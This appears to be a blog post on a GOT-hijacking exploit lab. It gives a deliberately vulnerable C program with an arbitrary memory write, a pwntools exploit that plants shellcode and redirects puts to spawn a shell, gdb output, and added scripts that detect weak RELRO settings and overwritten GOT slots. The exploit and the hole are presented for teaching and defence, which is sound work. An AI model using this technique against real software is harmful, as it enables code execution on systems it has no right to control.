Stack overflow - GOT table hijacking test


1. Target program source code

#include <stdio.h>
#include <unistd.h>

char name[64];                    /* global buffer, lives in the binary's writable data segment */

int main()
{
    unsigned long long addr;      /* user-supplied write destination */
    setvbuf(stdin, 0, 2, 0);      /* 2 == _IONBF: unbuffered, so prompts and reads are not reordered */
    setvbuf(stdout, 0, 2, 0);
    printf("What's you name?\n");
    read(0, name, 0x40);          /* 64 bytes into the 64-byte buffer, no overflow here */
    printf("Where do you want to write?\n");
    scanf("%llu", &addr);         /* the destination address is taken from the user unchecked */
    printf("Data:");
    read(0, (char *)addr, 8);     /* arbitrary 8-byte write: the whole vulnerability */
    puts("Done!");                /* first call through puts@got.plt after the write */
    printf("Thank you %s!\n", name);
    return 0;
}
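What makes the write at `read(0,(char *)addr,8)` turn into control-flow hijack is that the GOT slot (`puts@got.plt` at 0x404018 in the gdb output below) is still writable when main() runs: the binary uses lazy binding with only Partial RELRO. Under Full RELRO (`-Wl,-z,relro,-z,now`) the loader resolves every import up front and then remaps the whole GOT read-only, so the same 8-byte write would fault instead of redirecting puts. The following check is an added example, not code from the original post: it parses the ELF64 program headers and dynamic section directly (the same rule `checksec` applies) and reports the RELRO level. `build_test_elf` builds a constructed, minimal ELF image so the script can be exercised without the target binary; pass a real path on the command line to check a compiled binary.

```python
import struct
import sys

# ELF constants from elf.h / the ELF specification.
PT_LOAD = 1
PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552
DT_NULL = 0
DT_BIND_NOW = 24
DT_FLAGS = 30
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1


def program_headers(data):
    """Parse the ELF64 program header table into a list of dicts."""
    if data[:4] != b"\x7fELF" or data[4] != 2:  # EI_CLASS must be ELFCLASS64
        raise ValueError("not a 64-bit ELF image")
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    headers = []
    for i in range(e_phnum):
        fields = struct.unpack_from("<IIQQQQQQ", data, e_phoff + i * e_phentsize)
        p_type, p_flags, p_offset, _vaddr, _paddr, p_filesz, _memsz, _align = fields
        headers.append({"type": p_type, "flags": p_flags, "offset": p_offset, "filesz": p_filesz})
    return headers


def dynamic_entries(data, headers):
    """Return {d_tag: d_val} from the PT_DYNAMIC segment (empty for a static binary)."""
    for ph in headers:
        if ph["type"] != PT_DYNAMIC:
            continue
        entries, off, end = {}, ph["offset"], ph["offset"] + ph["filesz"]
        while off + 16 <= end:
            tag, val = struct.unpack_from("<QQ", data, off)
            if tag == DT_NULL:
                break
            entries[tag] = val
            off += 16
        return entries
    return {}


def relro_level(data):
    """'full', 'partial' or 'none'.

    full    = PT_GNU_RELRO present and the loader is told to bind now, so the
              GOT is fully relocated and remapped read-only before main() runs
    partial = PT_GNU_RELRO present but lazy binding: .got.plt stays writable
    none    = no PT_GNU_RELRO segment at all
    """
    headers = program_headers(data)
    dyn = dynamic_entries(data, headers)
    has_relro = any(ph["type"] == PT_GNU_RELRO for ph in headers)
    bind_now = (DT_BIND_NOW in dyn
                or bool(dyn.get(DT_FLAGS, 0) & DF_BIND_NOW)
                or bool(dyn.get(DT_FLAGS_1, 0) & DF_1_NOW))
    if has_relro and bind_now:
        return "full"
    return "partial" if has_relro else "none"


def build_test_elf(relro, bind_now):
    """Constructed minimal ELF64 image (header, two phdrs, dynamic section); test input only."""
    dyn = struct.pack("<QQ", DT_FLAGS, DF_BIND_NOW) if bind_now else b""
    dyn += struct.pack("<QQ", DT_NULL, 0)
    dyn_off = 64 + 2 * 56  # dynamic section placed right after the program header table
    dyn_ph = struct.pack("<IIQQQQQQ", PT_DYNAMIC, 6, dyn_off, 0x403E00, 0x403E00, len(dyn), len(dyn), 8)
    if relro:
        second = struct.pack("<IIQQQQQQ", PT_GNU_RELRO, 4, dyn_off, 0x403E00, 0x403E00, len(dyn), len(dyn), 1)
    else:
        second = struct.pack("<IIQQQQQQ", PT_LOAD, 5, 0, 0x400000, 0x400000, 0, 0, 0x1000)
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # ELFCLASS64, little-endian, SysV ABI
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x401000, 64, 0, 0, 64, 56, 2, 0, 0, 0)
    return ehdr + dyn_ph + second + dyn


if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python3 relro_check.py ./got
        with open(sys.argv[1], "rb") as f:
            print(sys.argv[1], "RELRO:", relro_level(f.read()))
    else:
        for relro, now in [(False, False), (True, False), (True, True)]:
            print(f"relro={relro} bind_now={now} -> {relro_level(build_test_elf(relro, now))}")
```

On a binary built like the one in this post the script reports `partial`; rebuilding with `-Wl,-z,relro,-z,now` moves it to `full`, and the GOT entry the exploit targets is then in a read-only page by the time `read` is reached. The same answer can be read off `readelf -l` (look for a `GNU_RELRO` segment) and `readelf -d` (look for `BIND_NOW`).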

2. Exploit code
from pwn import *

context(arch = 'amd64', os = 'linux')

r = process("./got")
input()                        # pause so a debugger can be attached (Python 3; was raw_input())
print(r.recvline())            # "What's you name?"

r.send(asm(shellcraft.sh()))   # fills the global name buffer

print(r.recvline())            # "Where do you want to write?"

r.sendline(str(0x404018))      # send puts address (puts@got.plt) in the decimal form %llu expects

print(r.recvuntil("Data:"))
input()
r.send(p64(0x404080))          # send name address

r.interactive()

3. Debugging
a. puts GOT entry before the overwrite
gdb-peda$ x/x 0x404018
0x404018 <puts@got.plt>: 0x00007fa3f4daf5a0
b. puts GOT entry after the overwrite
gdb-peda$ x/x 0x404018
0x404018 <puts@got.plt>: 0x0000000000404080
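The two gdb dumps above are the whole detection signal: a GOT slot that used to point into libc's code now points at 0x404080, inside the program's own writable data. The following added example (not part of the original post) turns that observation into a check a debugger script or process-inspection tool can run: it resolves every GOT value against the process memory map and flags any slot whose target is not executable code in a shared object. `SAMPLE_MAPS` is a constructed /proc/<pid>/maps excerpt; its ranges and the path `/home/user/got` are assumptions chosen so that the two values from the dumps land where they would in a real run.

```python
import re

# One /proc/<pid>/maps line: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+\S+\s+\S+\s+\S+\s*(.*)$")

# Constructed maps excerpt (addresses and paths are made up, not captured from a real process).
# 0x7fa3f4daf5a0 falls inside libc's r-xp mapping; 0x404080 falls inside the binary's rw-p
# data page, which is where the global `name` buffer lives.
SAMPLE_MAPS = """\
00400000-00401000 r--p 00000000 08:01 5678 /home/user/got
00401000-00402000 r-xp 00001000 08:01 5678 /home/user/got
00402000-00403000 r--p 00002000 08:01 5678 /home/user/got
00403000-00405000 rw-p 00002000 08:01 5678 /home/user/got
7fa3f4d68000-7fa3f4d8a000 r--p 00000000 08:01 1234 /lib/x86_64-linux-gnu/libc.so.6
7fa3f4d8a000-7fa3f4f21000 r-xp 00022000 08:01 1234 /lib/x86_64-linux-gnu/libc.so.6
7fa3f4f21000-7fa3f4f6f000 r--p 001b9000 08:01 1234 /lib/x86_64-linux-gnu/libc.so.6
7fa3f4f73000-7fa3f4f79000 rw-p 00000000 00:00 0
7ffd1c3a0000-7ffd1c3c1000 rw-p 00000000 00:00 0 [stack]
"""


def parse_maps(text):
    """Return [(start, end, perms, path)] for every parsable maps line."""
    regions = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            start, end, perms, path = m.groups()
            regions.append((int(start, 16), int(end, 16), perms, path))
    return regions


def region_for(regions, addr):
    """Find the mapping containing addr, or None if the address is unmapped."""
    for start, end, perms, path in regions:
        if start <= addr < end:
            return start, end, perms, path
    return None


def audit_got(regions, got_entries, binary_path):
    """Classify each GOT slot value by the mapping it points into.

    A resolved import must land in executable code of a shared object. A slot
    that still points into the binary's own text is the lazy-binding PLT stub
    (not resolved yet). Anything non-executable or unmapped cannot be a valid
    function pointer, which is exactly what the overwrite above produces.
    """
    report = {}
    for name, target in got_entries.items():
        reg = region_for(regions, target)
        if reg is None:
            report[name] = "suspicious: unmapped"
        elif "x" not in reg[2]:
            report[name] = "suspicious: target not executable"
        elif reg[3] == binary_path:
            report[name] = "unresolved: plt stub"
        elif ".so" in reg[3]:
            report[name] = "ok"
        else:
            report[name] = "suspicious: unexpected mapping"
    return report


if __name__ == "__main__":
    regions = parse_maps(SAMPLE_MAPS)
    before = {"puts": 0x00007FA3F4DAF5A0}  # value from the 'before' gdb dump
    after = {"puts": 0x0000000000404080}   # value from the 'after' gdb dump
    print("before:", audit_got(regions, before, "/home/user/got"))
    print("after: ", audit_got(regions, after, "/home/user/got"))
```

The check is deliberately permission-based rather than address-based: it does not need to know where libc was loaded, only that a resolved slot must point into executable pages of a shared object. On a live process the same function can be fed the real `/proc/<pid>/maps` text and GOT values read from the `.got.plt` section.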

posted @ 2020-10-20 20:56  S_m_workers  views (414)  comments (0)